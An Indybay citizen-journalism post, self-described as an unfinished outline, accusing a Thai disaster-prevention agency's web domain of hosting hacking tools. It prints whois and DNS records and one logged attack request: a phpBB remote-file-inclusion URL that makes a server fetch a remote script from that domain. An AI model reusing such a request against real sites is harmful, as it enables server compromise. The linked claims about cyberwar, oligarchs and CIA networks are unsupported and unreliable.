top
International
International
Indybay
Indybay
Santa Cruz
Santa Cruz
Indybay
Regions
Indybay Regions North Coast Central Valley North Bay East Bay South Bay San Francisco Peninsula Santa Cruz IMC - Independent Media Center for the Monterey Bay Area North Coast Central Valley North Bay East Bay South Bay San Francisco Peninsula Santa Cruz IMC - Independent Media Center for the Monterey Bay Area California United States International Americas Haiti Iraq Palestine Afghanistan
Topics
Newswire
Calendar
Features
From the Open-Publishing Calendar
From the Open-Publishing Newswire
Indybay Feature
Homeland Security in Bangkok Launches Cyberwar Against Dissidents
by David Roknich (roknich (at) electromagnet.us)
Saturday May 10th, 2008 8:02 AM
In spite of the boom and bust cycle of shrimp farming, Thailand has continued to maintain relative calm in the eye of a storm called "Indochina". Just across the "Friendship Bridge" lies the Empire of Unocal and Halliburton, where the threat of genocide has loomed for decades, and tentacles spread through Thailand where information warfare was launched on New Years Day, 2007. It has reached a new level today.

here are the keywords and an outline.
timely story in progress.

immediate occassion:

Cyber-attacks from Thai Homeland Security

The Thai equivalent of our DHS didn't exist until 2004, and got a tremendous boost on January 1, 2007.

Their domain registration helps document their history:

Domain Name: CDPM3.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: MYNA.CAT.NET.TH
Name Server: TEAL.CAT.NET.TH
Status: ok
Updated Date: 11-dec-2007
Creation Date: 08-dec-2004
Expiration Date: 08-dec-2008

I wasn't able to connect the dots until today when I witnessed a series of attacks against a server which hosts stories of genocide in Myanmar, and amphetamine distribution in Thailand produced under the direct protection of the military junta. Our own DEA has documented this drug trade (in addition to vast opium exports), and I have also found some translations of first hand accounts from Thailand.

The "Friendship Bridge" is important for a number of reasons. It is a conduit for illicit cargo. Some of the cargo is human. These are the victims of an oligarchy that has manipulated both nations for the past decade, an oligarchy that will use the disaster today to accomplish a goal they have long sought. And the oligarchy has fought on every front, including the frontiers of cyberspace.

Spam, phishing, and cyber-attacks of every type seem to be the full time occupation of most servers with asian addresses - but it is at least odd find "hacking tools" on the server of a nation's Homeland Security Department. And here are some more details from Bangkok:

Registrant:
Department of Disaster Prevention and Mitigation
3/12 Utongnok Road
Dusit, Bangkok 10300
TH

Domain name: CDPM3.COM

Administrative Contact:
Phopapapan, Supakit
psupskit@yahoo.com
3/12 Utongnok Road
Dusit, Bangkok 10300
TH
+662-241-4403
Fax: +662-241-4403

Registration Service Provider:
Netway Communication Co., Ltd.,
domreg@siamdomain.com
66-2-639-7700
http://www.siamdomain.com

Registrar of Record: TUCOWS, INC.
Record last updated on 11-Dec-2007.
Record expires on 08-Dec-2008.
Record created on 08-Dec-2004.

Domain servers in listed order:
MYNA.CAT.NET.TH
TEAL.CAT.NET.TH

DNS RECORDS:

cdpm3.com  IN	SOA   myna.cat.net.th
cdpm3.com  IN	NS      myna.cat.net.th
cdpm3.com  IN	A        61.19.100.10	
10.100.19.61.in-addr.arpa  IN	PTR www.cdpm1.com

The incriminating URL, where evidence exists right now:

http://www.cdpm3.com/id.txt

You won't want to enter it with a "?" at the end, or the command in the text file may be launched. That's how it is used by hackers at remote locations, such as the folks at IP 69.64.33.211

And here is an example that I witnessed in real time, and blocked via htaccess:

/dogspot//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.cdpm3.com/id.txt?
Date: May 10 08:20:20 (Eastern Standard Time)
Agent: libwww-perl/5.805

The hackers have named their server:

air176.startdedicated.com.

1976 was the last year that Air America would fly, thanks to the investigations led by Frank Church.

Wikipedia has some good background for the current intrigue. Please read:

Air America was an American passenger and cargo airline covertly owned and operated by the Central Intelligence Agency (CIA) from 1950 to 1976. It supplied and supported covert operations in Southeast Asia during the Second Indochina War. Air America
2 important figures are Vang Pao and Eli Popovich. The role Popovich played has been kept secret until recently. The accounts by Alfred W. McCoy are authoritative. The "historian" Leary, of the Univerisity of Georgia, remained in the pocket of the CIA, and thus was spared the threats to his life that McCoy endured.

You won't easily find out who is really operating the server on North Tucker Road in St. Louis, MO where the subdomain

air176.startdedicated.com.

is hosted.Try the abuse contact at

http://server4you.net

if you want to waste your time. It is a subdomain delegated from 85.25.10.39, hosted in Germany by "PlusServer" at intergenia.de

historical background:

Role of Burma (Myanmar) and Thailand in the economy of South Asia

keywords and notes:

"Alfred McCoy" opium, burma, namebase, "golden triangle", warlords, afghanistan, WA Amphetamine empire, engagement with unocal

When I originally published "New Years Bombing in Bangkok" from wire stories and tourist reports on New Year 2007, I couldn't figure out why it was so popular. Now I am beginning to understand.

The great game continues in Myanmar (world's top opium producer in 1999), but I have not yet had breakfast. Enter the keywords above into google, and you'll have the background for my story.

David Roknich,
Editor

DOGSPOT

We are 100% volunteer and depend on your participation to sustain our efforts!

Donate

donate now

$ 92.00 donated
in the past month

Get Involved

If you'd like to help with maintaining or developing the website, contact us.

Publish

Publish your stories and upcoming events on Indybay.

IMC Network